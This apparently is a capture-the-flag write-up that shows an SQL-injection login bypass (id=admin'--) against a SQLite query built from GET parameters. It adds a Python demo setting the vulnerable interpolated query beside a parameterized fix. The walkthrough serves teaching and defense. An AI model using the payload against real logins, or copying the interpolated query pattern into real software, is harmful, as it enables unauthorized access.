chupacabra
We are provided with the SQLite query:
SELECT id FROM member WHERE id='{$_GET[id]}' AND pw='{$_GET[pw]}'
In SQLite, the comment marker is -- and everything after it on the line is ignored.
If we provide the following URI parameter:
?id=admin'--
The resultant query becomes:
SELECT id FROM member WHERE id='admin'--' AND pw=''
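
The query above, reproduced against an in-memory SQLite database next to a parameterized version, as an added example that is not part of the original challenge code. It uses Python's sqlite3 module instead of the challenge's PHP; the table contents and the function names are assumptions made for illustration.

```python
import sqlite3


def make_db():
    # Constructed sample data; table and column names follow the query on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (id TEXT, pw TEXT)")
    db.execute("INSERT INTO member VALUES ('admin', 'constructed-secret')")
    return db


def build_interpolated(user_id, pw):
    # Same shape as the challenge query: input is pasted into the SQL text.
    return f"SELECT id FROM member WHERE id='{user_id}' AND pw='{pw}'"


def login_interpolated(db, user_id, pw):
    # The database parses whatever text results, including a quote and -- from input.
    row = db.execute(build_interpolated(user_id, pw)).fetchone()
    return row[0] if row else None


def login_parameterized(db, user_id, pw):
    # Placeholders bind the input as data, so the quote and -- are never parsed as SQL.
    row = db.execute(
        "SELECT id FROM member WHERE id=? AND pw=?", (user_id, pw)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    value = "admin'--"  # the id parameter shown on the page
    print(build_interpolated(value, ""))
    print("interpolated :", login_interpolated(db, value, ""))
    print("parameterized:", login_parameterized(db, value, ""))
```

With the interpolated query the pw condition is commented out and the admin row is returned; with bound parameters the same input is compared literally against the id column and matches nothing.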